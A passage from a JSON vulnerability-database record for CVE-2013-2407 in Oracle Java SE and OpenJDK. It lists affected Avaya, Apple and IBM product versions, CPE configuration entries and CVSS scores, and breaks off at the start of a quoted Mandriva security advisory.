"avaya", "version": "1.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura conferencing sp1 standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "trio tview software", "scope": "ne", "trust": 0.3, "vendor": "schneider electric", "version": "3.29.0" }, { "model": "network and security manager software 2012.2r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "websphere real time sr5", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "websphere mq", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.3" }, { "model": "websphere mq", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.4" }, { "model": "websphere mq", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.11" }, { "model": "websphere message broker", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.12" }, { "model": "virtualization engine ts7700", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.31.0.89" }, { "model": "tivoli system automation for integrated operations management", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.5" }, { "model": "tivoli storage productivity center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.1.1.2" }, { "model": "tivoli storage productivity center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.170" }, { "model": "rational software architect design manager", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "rational rhapsody design manager", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "java sdk sr5", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java sdk sr6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.0.1" }, { "model": "java sdk sr14", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "java sdk sr16-fp3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "java sdk sr13-fp18", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "integration bus", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" } ], "sources": [ { "db": "BID", "id": "60653" }, { "db": "CNNVD", "id": "CNNVD-201306-295" }, { "db": "NVD", "id": "CVE-2013-2407" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update21:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.7.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update21:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.7.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update35:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update39:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update32:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update30:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update37:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update34:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update43:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:*:update45:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.6.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_19:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_17:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update27:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_18:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update33:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update32:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update31:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update23:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update22:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_21:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update25:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update24:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update29:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_20:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:sun:jdk:1.6.0:update1_b06:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update37:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update35:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update26:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update34:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:*:update45:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.6.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update39:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update41:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update43:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update38:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update30:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2013-2407" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Oracle", "sources": [ { "db": "BID", "id": "60653" } ], "trust": 0.3 }, "cve": "CVE-2013-2407", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "impactScore": 4.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2013-2407", "impactScore": 4.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2013-2407", "trust": 1.0, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201306-295", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2013-2407", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-2407" }, { "db": "CNNVD", "id": "CNNVD-201306-295" }, { "db": "NVD", "id": "CVE-2013-2407" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier and 6 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality and availability via unknown vectors related to Libraries. NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to \"XML security and the class loader.\". \nThe vulnerability can be exploited over multiple protocols. This issue affects the \u0027Libraries\u0027 sub-component. \nThis vulnerability affects the following supported versions:\n7 Update 21 , 6 Update 45. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n _______________________________________________________________________\n\n Mandriva Linux Security Advisory MDVSA-2013:196\n http://www.mandriva.com/en/support/security/\n _______________________________________________________________________\n\n Package : java-1.6.0-openjdk\n Date : July 15, 2013\n Affected: Enterprise Server 5.0\n _______________________________________________________________________\n\n Problem Description:\n\n Updated 